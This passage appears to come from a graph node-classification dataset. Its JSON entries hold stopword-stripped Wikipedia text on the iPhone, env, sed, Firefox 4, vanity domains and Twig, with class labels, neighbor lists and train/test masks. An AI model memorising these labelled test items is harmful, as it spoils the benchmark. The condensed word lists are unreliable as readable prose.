displayed speech bubbles similar ichat recipient name iphone built-in support email message forwarding drafts direct internal camera-to-email picture sending support multi-recipient sms added 1.1.3 software update support mms added 3.0 update original first generation iphone us september 25 2009 wwdc 2007 june 11 2007 apple announced iphone would support third-party web applications using ajax share look feel iphone interface october 17 2007 steve jobs open letter posted apple hot news weblog announced software development kit sdk would made available third-party developers february 2008 iphone sdk officially announced released march 6 2008 apple town hall facility free download apple registration allows developers develop native applications iphone ipod touch test iphone simulator however loading application onto real device possible paying apple developer connection membership fee developers free set price applications distributed app store receive 70 share developers also opt release application free pay costs release distribute application beyond membership fee app store launched release ios 2.0 july 11 2008 update free iphone users owners older ipod touches required pay us 10 developer submitted application app store apple holds firm control distribution apple halt distribution applications deems inappropriate example rich us 1000 program simply demonstrated wealth user apple criticized banning third-party applications enable functionality apple want iphone 2008 apple rejected podcaster allowed iphone users download podcasts directly iphone claiming duplicated functionality itunes apple since released software update grants capability netshare another rejected app would enabled users tether iphone laptop desktop using cellular network load data computer many carriers iphone later globally allowed tethering apple officially supported upgrade ios 3.0 mobility relative latecomer united states cases carrier charges extra tethering iphone sdk released third parties permitted design web apps would run safari unsigned native applications also available jailbroken phones ability install native applications onto iphone outside app store supported apple stated reason native applications could broken software update apple stated design software updates specifically break native applications perform sim unlocking apple passed 60 billion app downloads 140 billion app downloads app store app store 2.2million apps iphone original iphone described revolutionary game-changer mobile phone industry credited helping make apple one world valuable publicly traded companies 2011 newer iterations also received praise called best phone iphone attracts users ages besides consumer use iphone also adopted business purposes starting iphone 4s apple added accessibility feature optimize function iphone hearing aids apple released program made iphone hearing aids hearing aids deliver power-efficient high-quality digital audio experience allow user manage hearing aid right iphone made iphone hearing aids also feature live listen live listen iphone acts remote microphone sends sound made iphone hearing aid live listen help user hear conversation noisy room hear someone speaking across room braille displays ios program announced apple coinciding release iphone 3gs ipad ipod touch 3rd generation program added support 50 bluetooth wireless braille displays work ios box user needs pair keyboard device start using navigate ios device voiceover without additional software ios supports braille tables 25 languages iphone lets user know alert sent variety notice methods delivers visual vibrating alerts incoming phone facetime calls new text messages new sent mail calendar events users set led light flash incoming calls alerts incoming calls display photo caller users choose different vibration patterns even create iphone enlarge text make accessible vision-impaired users accommodate hearing-impaired users closed captioning external tty devices iphone 3gs also features white black mode voiceover screen reader zooming impaired vision mono audio limited hearing one ear apple regularly publishes voluntary product accessibility templates explicitly state compliance us regulation section 508 release ios 9 iphones users ability choose two different screen view options user choose standard view zoomed view iphone placed standard view setting icons normal size text remains zoomed view option icons screen text become slightly larger enables user customized appearance potentially help users read screen easier assistivetouch helps adapt multi-touch screen ios device user unique physical needs great assistance difficulty gestures like pinch one make accessible tap finger user create gestures customize layout assistivetouch menu user trouble pressing home button set activated onscreen tap gestures like rotate shake available even ios device mounted wheelchair guided access helps people autism attention sensory challenges stay focused task app hand guided access parent teacher therapist limit ios device stay one app disabling home button limit amount time spent app user restrict access keyboard touch input certain areas screen 21 different iphone models produced models bold current flagship devices apple filed 200 patent applications related technology behind iphone lg electronics claimed design iphone copied lg prada woo-young kwak head lg mobile handset r center said press conference consider apple copied prada phone design unveiled presented design award prize september 2006 conversely iphone also inspired share high-tech clones september 3 1993 infogear filed us trademark phone march 20 1996 applied trademark iphone phone registered march 1998 iphone registered 1999 since phone mark abandoned infogear trademarks cover communications terminals comprising computer hardware software providing integrated telephone data communications personal computer functions 1993 filing computer hardware software providing integrated telephone communication computerized global information networks 1996 filing 2000 infogear filed infringement claim owners iphones.com domain name owners iphones.com domain name challenged infringement claim northern district court california june 2000 cisco systems acquired infogear including iphone trademark september 2000 cisco systems settled owners iphones.com allowed owners keep iphones.com domain name along intellectual property rights use designation iphones.com domain name sale cellular phones cellular phones internet access wap phones handheld pdas storage devices computer equipment hardware/software digital cameras hardware/software intellectual property rights granted owners iphones.com domain name cisco systems september 2000 october 2002 apple applied iphone trademark united kingdom australia singapore european union canadian application followed october 2004 new zealand application september 2006 october 2006 singapore australian applications granted september 2006 company called ocean telecom services applied iphone trademark united states united kingdom hong kong following filing trinidad tobago ocean telecom trademark applications use exactly wording new zealand application apple assumed ocean telecom applying behalf apple canadian application opposed august 2005 canadian company called comwave applied trademark three months later comwave selling voip devices called iphone since 2004 shortly steve jobs january 9 2007 announcement apple would selling product called iphone june 2007 cisco issued statement negotiating trademark licensing apple expected apple agree final documents submitted night january 10 2007 cisco announced filed lawsuit apple infringement trademark iphone seeking injunction federal court prohibit apple using name february 2007 cisco claimed trademark lawsuit minor skirmish money interoperability february 2 2007 apple cisco announced agreed temporarily suspend litigation held settlement talks subsequently announced february 20 2007 reached agreement companies allowed use iphone name exchange exploring interoperability security consumer business communications products october 22 2009 nokia filed lawsuit apple infringement gsm umts wlan patents nokia alleges apple violating ten nokia patents since iphone initial release december 2010 reuters reported iphone ipad users suing apple inc. applications passing user information third-party advertisers without permission makers applications textplus4 paper toss weather channel dictionary.com talking tom cat pumpkin maker also named co-defendants lawsuit august 2012 apple smartphone patent lawsuit u.s. samsung world largest maker smartphones however december 6 2016 scotus reversed decision awarded nearly 400 million apple returned case federal circuit court define appropriate legal standard define article manufacture smartphone could case screen design patents relate march 2013 apple patent wraparound display revealed around april 20 2011 hidden unencrypted file iphone ios devices widely discussed media alleged file labeled consolidated.db constantly stores iphone user movement approximating geographic locations calculated triangulating nearby cell phone towers technology proven inaccurate times file released june 2010 update apple ios4 may contain almost year worth data previous versions ios stored similar information file called h-cells.plist f-secure discovered data transmitted apple twice day postulate apple using information construct global location database similar ones constructed google skyhook wardriving nevertheless unlike google latitude application performs similar task android phones file dependent upon signing specific eula even user knowledge stated 15,200 word-long terms conditions iphone apple partners licensees may collect use share precise location data including real-time geographic location user apple computer device file also automatically copied onto user computer synchronized iphone open-source application named iphonetracker turns data stored file visual map made available public april 2011 file erased without jailbreaking phone encrypted apple gave official response web site april 27 2011 questions submitted users associated press others apple clarified data small portion crowd-sourced location database cache wi-fi hotspots cell towers downloaded apple iphone making location services faster gps therefore data represent locations iphone volume data retained error apple issued update ios version 4.3.3 4.2.8 cdma iphone 4 reduced size cache stopped backed itunes erased entirely whenever location services turned upload apple also selectively disabled system services cell network search regardless july 2014 report state-owned china central television labeled iphone national security concern frequent locations feature found settings location services stores commonly visited locations locally device feature said help accuracy gps apple maps since log information locations user frequently visited however feature also keeps track number times user location dates exact times media outlets publicized instructions disabled concerned users revealed part 2013 mass surveillance disclosures american british intelligence agencies national security agency nsa government communications headquarters gchq access user data iphones blackberrys android phones respectively read almost smartphone information including sms location emails notes according article new york times titled signaling post-snowden era new iphone locks n.s.a apple developed new encryption method ios 8 described deep apple could longer comply government warrants asking customer information extracted devices throughout 2015 prosecutors united states argued u.s. government able compel decryption iphone contents 2015 san bernardino attack fbi recovered iphone 5c issued one shooters employer icloud backups phone month half shooting shooters destroyed personal phones u.s. government attempted obtain court order writs act compelling apple produce ipsw file would allow investigators brute force device passcode tim cook responded company website outlining need encryption arguing produce backdoor one device would inevitably used compromise privacy iphone users february 19 apple communicated journalists password apple id iphone changed within day government obtaining preventing apple producing workaround would target older devices see fbi–apple encryption dispute graykey manufactured grayshift unlock iphones even disabled countermeasure apple implemented usb restricted mode apple privacy policy addresses requests government agencies access customers data apple never worked government agency country create 'backdoor products services also never allowed government access servers never 2015 electronic frontier foundation awarded apple five five stars commend ing apple strong stance regarding user rights transparency privacy apple ios combination specific hardware uses crypto-shredding activating erase content settings obliterating keys 'effaceable storage renderes user data device cryptographically inaccessible apple tightly controls certain aspects iphone according jonathan zittrain emergence closed devices like iphone made computing proprietary early versions microsoft windows hacker community found many workarounds disallowed apple make difficult impossible obtain warranty service jailbreaking allows users install apps available app store modify basic functionality sim unlocking allows iphone used different carrier network however united states apple void iphone warranty unless show problem component failure linked installation placement after-market item unauthorized applications federal trade commission magnuson-moss warranty act 1975 users set restrictions parental controls apps downloaded used within iphone restrictions area requires password iphone normally prevents access media player web features unless also activated phone authorized carrier july 3 2007 jon lech johansen reported blog successfully bypassed requirement unlocked iphone features combination custom software modification itunes binary published software offsets others use unlike first generation iphone iphone 3g must activated store countries makes iphone 3g difficult impossible hack need in-store activation well huge number first-generation iphone ipod touch users upgrading iphone os 2.0 caused worldwide overload apple servers july 11 2008 day iphone 3g iphone os 2.0 updates well mobileme released update devices required connect apple servers authenticate causing many devices temporarily unusable users o2 network united kingdom however buy phone online activate via itunes previous model even required vendors usually offer activation buyer convenience us apple begun offer free shipping iphone 3g iphone 3gs available reversing in-store activation requirement best buy walmart also sell iphone iphone operating system designed run software apple-approved cryptographic signature restriction overcome jailbreaking phone involves replacing iphone firmware slightly modified version enforce signature check may circumvention apple technical protection measures apple statement united states copyright office response electronic frontier foundation eff lobbying dmca exception kind hacking claimed jailbreaking iphone would copyright infringement due necessary modification system software however 2010 jailbreaking declared officially legal united states dmca jailbroken iphones may susceptible computer viruses incidents reported ios android 2.3.3 'gingerbread may set dual boot jailbroken iphone help openiboot idroid 2007 2010 2011 developers released series tools called jailbreakme used security vulnerabilities mobile safari rendering jailbreak device allows users install compatible software device instead app store apps exploits quickly fixed ios updates apple theoretically flaws could also used malicious purposes july 2011 apple released ios 4.3.5 4.2.10 cdma iphone fix security vulnerability certificate validation following release iphone 5s model group german hackers called chaos computer club announced september 21 2013 bypassed apple new touch id fingerprint sensor using easy everyday means group explained security system defeated photographing fingerprint glass surface using captured image verification spokesman group stated hope finally puts rest illusions people fingerprint biometrics plain stupid use something ca n't change leave everywhere every day security token iphones still sold sim lock restricts use phone one particular carrier common practice subsidized gsm phones unlike gsm phones however phone officially unlocked entering code locked/unlocked state maintained apple servers per imei set iphone activated iphone initially sold us network sim lock place various hackers found methods unlock phone specific network although sprint t-mobile verizon authorized iphone carriers united states unlocked iphones used carriers example unlocked iphone may used t-mobile network us unlocked iphone compatible t-mobile voice network may able make use 3g functionality i.e mobile web e-mail etc. quarter original first generation iphones sold us registered apple speculates likely shipped overseas unlocked lucrative market iphone 3g worldwide release march 26 2009 united states began selling iphone without contract though still sim-locked network up-front purchase price iphone units often twice expensive bundled contracts outside united states policies differ especially us territories insular areas like guam gta teleguam exclusive carrier iphone since introduction none four us carriers sprint t-mobile verizon presence area since 2013 docomo pacific ended gta exclusivity starting iphone 5 beginning april 8 2012 began offering factory sim unlock option apple calls whitelisting allowing used carrier phone supports iphone owners reported verizon 4g lte phones come factory unlocked discovery verizon announced 4g lte phones including iphones would remain unlocked due regulations fcc placed 700 mhz c-block spectrum used verizon united kingdom o2 ee 3 vodafone tesco mobile sell device subsidised contracts use pay go locked network initially though usually unlocked either certain period contract length passed small fee exception 3 network unlock device time charge however current versions iphone available purchase sim-free apple store apple online store consequently unlocked use gsm network iphones purchased full retail price apple store online apple.com come unlocked allows customer selection carriers iphones sold canada purchased mobile carries telus rogers bell locked respective networks unlocking required visiting carrier store paying unlocking fee third party methods unlock iphones existed highly unreliable sometimes rendered phones unusable however 2017 crtc abolished sim-locking required mobile devices sold december 1 2017 come unlocked crtc also mandated carriers must offer unlocking services existing devices free consumers regardless whether purchased phone three major carriers australia optus telstra vodafone offer legitimate unlocking cost iphone devices current prior models internationally policies vary many carriers sell iphone unlocked full retail price 2003 four years iphone officially introduced trademark ifone registered mexico communications systems services company ifone apple tried gain control brandname mexican court denied request case began 2009 mexican firm sued apple supreme court mexico upheld ifone rightful owner held apple iphone trademark violation brazil brand iphone registered 2000 company called gradiente eletrônica s.a. igb eletrônica s.a according filing gradiente foresaw revolution convergence voice data internet time brazil final battle brandname concluded 2008 december 18 2012 igb launched line android smartphones tradename exclusive rights local market february 2013 brazilian patent trademark office known instituto nacional da propriedade industrial issued ruling gradiente eletrônica apple owned iphone mark brazil iphone term registered gradiente 2000 7 years apple release first iphone decision came three months gradiente eletrônica launched lower-cost smartphone using iphone brand june 2014 apple second time right use brandname brazil court ruling determined gradiente registration exclusive rights brand although gradiente intended appeal decision apple use freely brand without paying royalties brazilian company philippines solid group launched myphone brand 2007 stylized my|phone solid broadband filed trademark application brand apple later filed trademark case intellectual property office philippines ipophl solid broadband myphone confusingly similar iphone may likely deceive cause confusion among consumers apple lost trademark battle solid group 2015 decision made ipo director nathaniel arevalo also reportedly said unlikely consumers would confused iphone myphone case giant trying claim territory entitled great prejudice local 'pinoy phone merchant managed obtain significant foothold mobile phone market marketing sale innovative products distinctive trademark arevalo later added",
    "neighbors": [
      7171,
      10755,
      5637,
      6,
      1549,
      7182,
      4623,
      5647,
      7697,
      3602,
      4114,
      5138,
      11289,
      3610,
      7706,
      2076,
      7199,
      8735,
      1057,
      1576,
      3626,
      4139,
      6186,
      3629,
      6700,
      9262,
      1074,
      3634,
      7730,
      8754,
      7222,
      11319,
      9784,
      1083,
      2107,
      8253,
      8767,
      576,
      7745,
      10303,
      2630,
      5191,
      8774,
      77,
      6222,
      5199,
      8271,
      8783,
      4690,
      4180,
      10838,
      1623,
      3672,
      3162,
      5210,
      9308,
      10330,
      4190,
      3167,
      10336,
      3681,
      9826,
      5733,
      8806,
      107,
      3691,
      6763,
      8303,
      2673,
      2676,
      6264,
      10874,
      7292,
      2686,
      6783,
      7806,
      4737,
      10878,
      2179,
      11391,
      11398,
      1674,
      7307,
      8842,
      6797,
      9356,
      8336,
      9363,
      149,
      5784,
      1177,
      10393,
      4251,
      3228,
      6301,
      9886,
      2207,
      2208,
      4258,
      7842,
      10406,
      11430,
      3241,
      171,
      5292,
      685,
      6318,
      2735,
      3248,
      8367,
      6834,
      4787,
      9391,
      4789,
      2232,
      4283,
      3772,
      7869,
      1216,
      199,
      5319,
      713,
      3790,
      7887,
      9424,
      7378,
      2259,
      7893,
      3286,
      4822,
      9430,
      8409,
      1242,
      8921,
      8923,
      3293,
      4318,
      8413,
      6368,
      225,
      2273,
      6884,
      8934,
      231,
      7912,
      6377,
      2282,
      9451,
      1772,
      4844,
      9964,
      752,
      753,
      1776,
      5874,
      5875,
      10481,
      4856,
      6904,
      7928,
      8441,
      1276,
      7420,
      11000,
      11513,
      5376,
      3330,
      2819,
      5384,
      1290,
      1802,
      3338,
      781,
      9999,
      784,
      4369,
      10512,
      1300,
      2837,
      7958,
      4888,
      5912,
      8472,
      1819,
      6429,
      7459,
      5927,
      10023,
      303,
      4399,
      7983,
      11062,
      823,
      7991,
      2361,
      2363,
      2365,
      2366,
      9022,
      11584,
      7489,
      1346,
      9537,
      7492,
      10052,
      838,
      10562,
      7496,
      6474,
      8012,
      2383,
      4943,
      10576,
      2388,
      3928,
      857,
      4957,
      10078,
      6495,
      2404,
      1381,
      9063,
      4457,
      10602,
      3948,
      11629,
      3950,
      10608,
      7541,
      11137,
      7556,
      2950,
      2439,
      6023,
      6537,
      1930,
      6539,
      7051,
      7052,
      11655,
      1428,
      10645,
      10646,
      1945,
      410,
      3483,
      10658,
      2979,
      5028,
      9123,
      11170,
      11171,
      424,
      11173,
      5546,
      10154,
      8109,
      9648,
      10675,
      10164,
      2492,
      446,
      7614,
      8641,
      5058,
      2502,
      456,
      8136,
      1482,
      9163,
      2508,
      7118,
      464,
      5072,
      6608,
      11221,
      8662,
      9174,
      10199,
      4061,
      7133,
      9182,
      4068,
      4580,
      5093,
      487,
      2023,
      8170,
      9198,
      11248,
      7154,
      4595,
      1524,
      5619,
      6646,
      7669,
      11254,
      11257,
      6654,
      4607
    ],
    "mask": "Test"
  },
  {
    "node_id": 9733,
    "label": 2,
    "text": "Env:env env shell command unix unix-like operating systems used either print list environment variables run another utility altered environment without modify currently existing environment using env variables may added removed existing variables may changed assigning new values practice env another common use often used shell scripts launch correct interpreter usage environment typically changed version codice_1 bundled gnu coreutils written richard mlynarik david mackenzie print list environment variables simply run env without arguments clear environment creating new environment without existing environment variables new shell launch x application xcalc appear different display note use env often unnecessary since shells support setting environment variables front command env may also used hashbang line script allow interpreter looked via path example code simple python script example /usr/bin/env full path env command environment altered note possible specify interpreter without using env giving full path python interpreter problem approach different computer systems exact path may different instead using env example interpreter searched located time script run makes script portable also increases risk wrong interpreter selected searches match every directory executable search path also suffers problem path env binary may also different per-machine basis",
    "neighbors": [
      515,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      8975,
      11663,
      4369,
      10387,
      5397,
      2198,
      6812,
      7196,
      4001,
      6138,
      2599,
      7847,
      8236,
      4398,
      7983,
      11442,
      1336,
      8504,
      7356,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      5706,
      3659,
      8522,
      1741,
      10967,
      9946,
      8675,
      10727,
      6120,
      8554,
      491,
      8954,
      11632,
      11249,
      4850,
      3571,
      5106,
      5492,
      8306,
      8692,
      9204,
      9714,
      506,
      10484,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 9734,
    "label": 5,
    "text": "Service_discovery:service discovery service discovery automatic detection devices services offered devices computer network service discovery protocol sdp network protocol helps accomplish service discovery service discovery aims reduce configuration efforts users service discovery requires common language allow software agents make use one another services without need continuous user intervention many service discovery protocols including",
    "neighbors": [
      514,
      10242,
      4107,
      11413,
      7837,
      10274,
      10402,
      10020,
      9381,
      168,
      425,
      5677,
      2996,
      7361,
      8404,
      1878,
      6750,
      4457,
      7018,
      10229,
      7928
    ],
    "mask": "None"
  },
  {
    "node_id": 9735,
    "label": 9,
    "text": "Sed:sed sed stream editor unix utility parses transforms text using simple compact programming language sed developed 1973 1974 lee e. mcmahon bell labs available today operating systems sed based scripting features interactive editor ed editor 1971 earlier qed quick editor 1965–66 sed one earliest tools support regular expressions remains use text processing notably substitution command popular alternative tools plaintext string manipulation stream editing include awk perl first appearing version 7 unix sed one early unix commands built command line processing data files evolved natural successor popular grep command original motivation analogue grep g/re/p substitution hence g/re/s foreseeing special-purpose programs command would also arise g/re/d mcmahon wrote general-purpose line-oriented stream editor became sed syntax sed notably use codice_1 pattern matching codice_2 substitution originated ed precursor sed common use time regular expression syntax influenced languages notably ecmascript perl later powerful language awk developed functioned cousins allowing powerful text processing done shell scripts sed awk often cited progenitors inspiration perl influenced perl syntax semantics notably matching substitution operators gnu sed added several new features including in-place editing files super-sed extended version sed includes regular expressions compatible perl another variant sed minised originally reverse-engineered 4.1bsd sed eric s. raymond currently maintained rené rebe minised used gnu project gnu project wrote new version sed based new gnu regular expression library current minised contains extensions bsd sed feature-rich gnu sed advantage fast uses little memory used embedded systems version sed provided minix sed line-oriented text processing utility reads text line line input stream file internal buffer called pattern space line read starts cycle pattern space sed applies one operations specified via sed script sed implements programming language 25 commands specify operations text input line running script sed ordinarily outputs pattern space line modified script begins cycle next line end-of-script behaviors available sed options script commands e.g codice_3 delete pattern space codice_4 quit codice_5 add next line pattern space immediately thus sed script corresponds body loop iterates lines stream loop loop variable current line number implicit maintained sed sed script either specified command line codice_6 option read separate file codice_7 option commands sed script may take optional address terms line numbers regular expressions address determines command run example codice_8 would run codice_3 delete command second input line printing lines second codice_10 would delete lines beginning space separate special buffer hold space may used sed commands hold accumulate text cycles sed command language two variables hold space pattern space goto-like branching functionality nevertheless language turing-complete esoteric sed scripts exist games sokoban arkanoid chess tetris main loop executes line input stream evaluating sed script line input lines sed script pattern-action pair indicating pattern match action perform recast conditional statement main loop working variables pattern space hold space input output streams default actions copy line pattern space print pattern space implicit possible write terse one-liner programs example sed program given print first 10 lines input stop following example shows typical common use sed substitution usage indeed original motivation sed versions sed expression must preceded codice_6 indicate expression follows codice_12 stands substitute codice_13 stands global means matching occurrences line would replaced regular expression i.e pattern searched placed first delimiting symbol slash replacement follows second symbol slash codice_1 conventional symbol originating character search ed could used make syntax readable occur pattern replacement useful avoid leaning toothpick syndrome substitution command originates search-and-replace ed implements simple parsing templating codice_15 provides pattern matching saving text via sub-expressions codice_16 either literal text format string containing characters codice_17 entire match special escape sequences codice_18 codice_19 n th saved sub-expression example codice_20 replaces occurrences cat dog cats dogs without duplicating existing codice_21 1st saved sub-expression regexp codice_18 format string substitutes output besides substitution forms simple processing possible using 25 sed commands example following uses command delete lines either blank contain spaces example uses following regular expression metacharacters sed supports full range regular expressions complex sed constructs possible allowing serve simple highly specialised programming language flow control example managed use label colon followed string branch instruction codice_29 instruction codice_29 followed valid label name move processing block following label unix sed often used filter pipeline program generatedata generates data sed makes small change replacing x example often useful put several sed commands one command per line script file codice_31 use codice_7 option run commands codice_33 file number commands may placed script file using script file also avoids problems shell escaping substitutions script file may made directly executable command line prepending shebang line containing sed command assigning executable permission file example file codice_31 created contents file may made executable current user codice_35 command chmod u+x subst.sed file may executed directly command line codice_36 option introduced gnu sed allows in-place editing files actually temporary output file created background original file replaced temporary file example hello world script file e.g. script.txt invoked codice_37 inputfilename input text file script changes inputfilename line 1 hello world quits printing result sed exits input lines past line 1 read printed sole output hello world example emphasizes many key characteristics sed follow various sed scripts executed passing argument sed put separate file executed via codice_7 making script executable replace instance certain word file redacted irc password save result delete line containing word yourword address '/yourword/ delete instances word yourword delete two words file simultaneously express previous example one line entering command line one may join two commands via semicolon next example sed usually works one line removes newlines sentences second line starts one space consider following text sed script turn text following text note script affects input lines start space script explained expressed single line via semicolons simple limited sed sufficiently powerful large number purposes sophisticated processing powerful languages awk perl used instead particularly used transforming line way complicated regex extracting template replacement though arbitrarily complicated transforms principle possible using hold buffer conversely simpler operations specialized unix utilities grep print lines matching pattern head print first part file tail print last part file tr translate delete characters often preferable specific tasks designed carry specialized utilities usually simpler clearer faster general solution sed ed/sed commands syntax continue used descendent programs text editors vi vim analog ed/sed sam/ssam sam plan 9 editor ssam stream interface yielding functionality similar sed",
    "neighbors": [
      515,
      516,
      3076,
      9733,
      6664,
      521,
      7196,
      2599,
      8236,
      9780,
      8262,
      5706,
      3659,
      5711,
      4690,
      9298,
      10855,
      9839,
      8306,
      10866,
      5759,
      9345,
      5256,
      6281,
      4750,
      10387,
      2198,
      8854,
      6812,
      7847,
      2739,
      4279,
      7356,
      2245,
      9926,
      1741,
      10967,
      9946,
      6369,
      7395,
      9444,
      5357,
      4850,
      10484,
      8954,
      5888,
      5383,
      7435,
      8975,
      4369,
      5397,
      4398,
      8499,
      823,
      1336,
      8504,
      8517,
      9542,
      8522,
      4433,
      11632,
      5492,
      8582,
      3976,
      11663,
      4001,
      9150,
      451,
      1987,
      965,
      7622,
      4057,
      475,
      8675,
      10727,
      6120,
      491,
      10732,
      11249,
      5106,
      506,
      8692,
      9204,
      6138,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 9736,
    "label": 5,
    "text": "Firefox_4:firefox 4 mozilla firefox 4 version firefox web browser released march 22 2011 first beta made available july 6 2010 release candidate 2 base final version released march 18 2011 codenamed tumucumaque firefox last large release cycle mozilla team planned smaller quicker releases following browser vendors primary goals version included improvements performance standards support user interface one security update april 2011 4.0.1 version 4 browser made obsolete release firefox 5 june 2011 marked transition giving much less weight major version numbers 5 major version numbers used december year 5 6 7 8 9 compared 4 nearly decade firefox development 1 2 3 4 october 13 2006 brendan eich mozilla chief technology officer wrote plans mozilla 2 referring comprehensive iteration since creation overall platform firefox mozilla products run objectives incorporated versions 3.0 3.5 3.6 largest changes however deferred firefox 4.0 early may 2010 mozilla plans firefox 4.0 officially detailed blog post mike beltzner firefox director may 25 2011 firefox release manager wrote email firefox 5 security update firefox 4 confirming firefox 4 entered end life phase mozilla longer issue updates mozilla continued issue updates firefox 3.6 4 eol declaration one update 4.0.1 issued firefox 4 lifetime many looking copy version 4 directed version 6 run powerpc macintoshes mozilla firefox 4 includes many new features since version 3.6 firefox 4 brings new user interface new look designed make faster early mockups new interface windows mac os x linux first made available july 2009 new features include improved doorhanger notifications firefox panorama feature lets user visually group tabs application tabs redesigned extension manager jetpack extensions support integration firefox sync support multitouch displays many changes made user interface default tabs top window location bar area formerly occupied window title bar stop reload go buttons combined single button placed right side address bar button changes dynamically based upon current state page windows vista windows 7 menu bar hidden default common actions moved new firefox menu upper left hand corner browser users create persistent app tabs customize tab bar well bookmark navigation bars many features similar ones introduced google chrome firefox 4 based gecko 2.0 engine adds improves support html5 css3 webm webgl also includes new javascript engine jägermonkey better xpcom apis jägermonkey new javascript engine designed work alongside tracemonkey engine introduced firefox 3.5 improves performance compiling non-traceable javascript machine language faster execution firefox 4 first version firefox drop native support gopher protocol however continued support available add-on firefox 4 introduces audio api provides way programmatically access create audio data associated html5 audio element allows example visualize raw sound data use filters show audio spectrum firefox 4 longer relies underlying os text layout/shaping instead uses harfbuzz allows smart opentype layout/shaping consistent across different operating systems firefox 4 marked major change performance comparison former versions 3.6 3.5 browser made significant progress sunspider javascript tests well improvements supporting html5 since firefox 4.0 beta 5 hardware acceleration content enabled default windows vista windows 7 machines using direct2d os x using quartz basically cpu-only linux using xrender hardware acceleration compositing enabled default windows xp windows vista windows 7 machines using direct3d os x linux using opengl using hardware acceleration allows browser tap computer graphics processing unit lifting burden cpu speeding display web pages acceleration enabled certain graphics hardware drivers one performance optimizations moving application data single file omni.jar using new file format based java archive format previous versions used multiple files java archive format later versions file renamed omni.ja firefox 4 contains support track header emerging standard web privacy header signals user request web service web visitor tracking service disabled future privacy request may become legal requirement also introduced ability delete flash cookies subjecting deletion rules ordinary http cookies nightly builds marked 4.0a1pre february june 2008 renamed 3.1a1pre afterwards 22 march 2011 24-hour launch period firefox 4 received 7.1 million downloads counted verified mozilla foundation date 3 million people downloaded second release candidate browser later became final version result new version browser received 10 million downloads first day notwithstanding fell behind previous record established launch firefox 3 2008 8 million second-day downloads browser reported 8.75 million lack official representative guinness monitor numbers made record attained firefox 3 unofficially broken official launch date usage share firefox 4 1.95 0.34 higher previous day according analytics website statcounter comparison usage share internet explorer 9 march 22 0.87 released prior week march 14 potential factor firefox 4 ’ higher usage share latter supports windows 2000 xp two operating systems internet explorer 9 support also launch mozilla prompted existing customers upgrade browsers newer version something microsoft ’ applied users older versions internet explorer instead microsoft prompted users upgrade via windows update several weeks launch march 26 2011 firefox 4 ’ usage share exceeded 10-year-old discontinued internet explorer 6 first time also date browser ’ usage share higher versions safari opera older versions firefox exception firefox 3.6 reference internet explorer 9 ’ usage share first exceeded internet explorer 6 may 1 2011 48 days release internet explorer 9 became second used version internet explorer first time may 22 2011 69 days release according statcounter firefox 4 reached usage share peak 16.7 june 19 2011 date started decline due weekly trends release firefox 5 firefox 4 represents departure user interface layout behaviour previous versions users face issues negotiating changes documented release notes firefox button groups menus firefox 4 displayed default windows 7 windows vista operating systems displayed operating systems selecting toolbars view menu unchecking menu bar menu bar restored selecting options firefox button menu checking menu bar certain menu items page info import importing bookmarks browser data available firefox button menu remain available menu bar menu bar displayed temporarily pressing releasing alt key selecting menu bar command pressing alt key dismisses menu bar prompt save session tabs windows presented default firefox 3 session restored next start user selected save quit option firefox 4 sessions saved next start session available history menu new feature called on-demand session restore overwrites previous session exit without prompting user check whether saved session time viewing history menu item restore previous session available greyed restorable session available",
    "neighbors": [
      6657,
      2579,
      6171,
      7708,
      9757,
      7713,
      10791,
      9768,
      9770,
      559,
      4661,
      3639,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      10860,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9395,
      9908,
      7861,
      11449,
      4797,
      7364,
      11466,
      7885,
      7889,
      4310,
      2777,
      8923,
      11487,
      737,
      4326,
      4331,
      4844,
      8443,
      7943,
      1295,
      1807,
      7951,
      2836,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      10057,
      2893,
      339,
      10078,
      11112,
      8557,
      7543,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      10658,
      5054,
      9152,
      4048,
      5078,
      482,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      5114,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 9737,
    "label": 8,
    "text": "Vanity_domain:vanity domain domain name system dns vanity domain domain name whose purpose express individuality person whose behalf registered contrasts domain names resolve organisation e.g company service organisation offers vanity domains may compared vanity car registration plates similarly identify owner individual someone relying another organisation services subdomain isp domain aliased individual user account vanity domain definitions include uses apply primarily regular domain names registered highest allowed level rather subdomains although technically speaking second-level domain actually subdomain top-level domain vanity domains operated behalf individuals typically offer full complement services organisational domain name rather host points would expected honour example dns record may contain mx record identifying mail server accepting e-mail domain may e-mail forwarding server record identifying shared web hosting service offering http may url redirection service well easily remembered vanity domains especially registered highest level allowed registrar offer advantage personal mobility continue associated person even person switches service providers top-level domain become part vanity url taking advantage countries ask proof residence register country-specific tlds top level domains allow user incorporate two three letters following dot using help spell desired name word phrase",
    "neighbors": [
      7370,
      5012,
      2887
    ],
    "mask": "Test"
  },
  {
    "node_id": 9738,
    "label": 8,
    "text": "Twig_(template_engine):twig template engine twig template engine php programming language syntax originates jinja django templates open source product licensed bsd license maintained fabien potencier initial version created armin ronacher symfony php framework comes bundled support twig default template engine since version 2 twig supported following integrated development environments text editors twig defines three kinds delimiters apostrophe escape character create iterative array associative array operators precedence less priority filters provide treatments expression place separated pipes example example demonstrates basic features twig",
    "neighbors": [
      6338,
      8644,
      7847,
      9320,
      6154,
      7658,
      5612,
      8846,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9739,
    "label": 3,
